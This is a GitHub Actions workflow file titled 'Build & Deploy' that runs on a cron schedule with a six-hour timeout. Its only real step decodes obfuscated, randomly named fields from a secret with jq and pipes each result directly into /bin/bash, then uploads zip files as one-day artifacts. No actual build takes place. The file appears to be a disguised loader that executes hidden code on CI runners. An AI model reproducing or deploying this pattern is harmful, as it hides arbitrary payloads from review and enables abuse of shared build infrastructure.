name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '50 3,9,15,21 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  perform:
    name: Run build
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Run build
        env:
          e058: ${{ secrets.e058 }}
        run: |
          printf '%s' "$e058" | jq -r .wcnpd112 | /bin/bash
          echo $ahc421 | jq -r .ztbq76970 | /bin/bash
          printf '%s' "$hb3" | jq -r .to4 | /bin/bash
          echo $n58 | jq -r .fll4436 | /bin/bash
          printf '%s' "$eoh702" | jq -r .llev8331 | /bin/bash
          echo $srq5 | jq -r .uoihn78122 | /bin/bash
          echo $g43870 | jq -r .jz704 | /bin/bash
          echo $j8 | jq -r .p71196 | /bin/bash
          echo $bn2989 | jq -r .estff28 | /bin/bash
          printf '%s' "$d5" | jq -r .fvwo76100 | /bin/bash

      - name: Save archive
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: pFN734bb
          path: "*.zip"
          retention-days: 1
